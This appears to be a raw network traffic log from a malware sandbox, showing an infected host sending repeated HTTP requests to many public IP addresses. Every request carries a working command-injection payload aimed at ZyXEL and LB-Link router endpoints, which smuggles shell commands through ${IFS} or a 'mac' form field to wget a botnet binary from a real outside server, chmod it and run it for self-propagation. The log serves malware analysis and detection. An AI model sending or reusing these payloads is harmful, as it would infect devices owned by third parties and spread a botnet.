                                                Jan 29, 2024 07:07:35.054586887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1208192.168.2.2335272132.249.85.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.054620981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1209192.168.2.2332812120.81.144.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.054658890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1210192.168.2.2353922202.99.156.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.054713964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1211192.168.2.2351124200.166.208.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.054727077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1212192.168.2.2351856191.3.72.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.054786921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1213192.168.2.2341934194.40.233.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.054821968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1214192.168.2.234028086.68.86.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.054857016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1215192.168.2.235614676.218.176.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.054883957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1216192.168.2.2359134134.190.42.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.054939032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1217192.168.2.2351646120.70.233.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.054970980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1218192.168.2.2360712137.51.200.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.055011988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1219192.168.2.2338440143.67.45.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.055056095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1220192.168.2.234992246.47.169.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.055098057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1221192.168.2.2333634191.105.145.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.055119991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1222192.168.2.2343410218.110.59.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.055171967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1223192.168.2.2342964222.234.127.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.055187941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1224192.168.2.235837853.136.248.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.055233955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1225192.168.2.2348536108.189.143.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.055298090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1226192.168.2.2340886204.137.203.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.055305958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1227192.168.2.2360090189.162.156.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.055341959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1228192.168.2.234239269.33.45.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.055394888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1229192.168.2.2333330165.89.77.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.055424929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1230192.168.2.2353378198.75.82.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.055455923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1231192.168.2.2341662169.126.230.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.055510998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1232192.168.2.233700848.184.30.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.055547953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1233192.168.2.235733462.3.142.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.055572033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1234192.168.2.234668493.161.4.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.055613041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1235192.168.2.23596862.204.147.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.055646896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1236192.168.2.2337948181.176.156.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.055701971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1237192.168.2.2354438190.233.197.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.055740118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1238192.168.2.2353298181.245.27.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.055771112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1239192.168.2.235038698.57.9.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.055799961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1240192.168.2.234316058.250.194.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.055840969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1241192.168.2.2346504204.25.162.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.055890083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1242192.168.2.233816618.94.92.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.055902004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1243192.168.2.2342762104.20.91.528080
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.106483936 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:07:35.223337889 CET328INHTTP/1.1 400 Bad Request
                                                Server: cloudflare
                                                Date: Mon, 29 Jan 2024 06:07:35 GMT
                                                Content-Type: text/html
                                                Content-Length: 155
                                                Connection: close
                                                CF-RAY: -
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1244192.168.2.2337906104.25.146.248080
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.106549978 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:07:35.223535061 CET328INHTTP/1.1 400 Bad Request
                                                Server: cloudflare
                                                Date: Mon, 29 Jan 2024 06:07:35 GMT
                                                Content-Type: text/html
                                                Content-Length: 155
                                                Connection: close
                                                CF-RAY: -
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1245192.168.2.2341056185.65.161.708080
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.435401917 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:07:36.075495005 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:07:37.355361938 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:07:40.138942957 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:07:45.258205891 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:07:55.496769905 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1246192.168.2.2347464103.150.8.1618080
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.485624075 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:07:35.748491049 CET115INHTTP/1.1 400 Bad Request
                                                connection: close
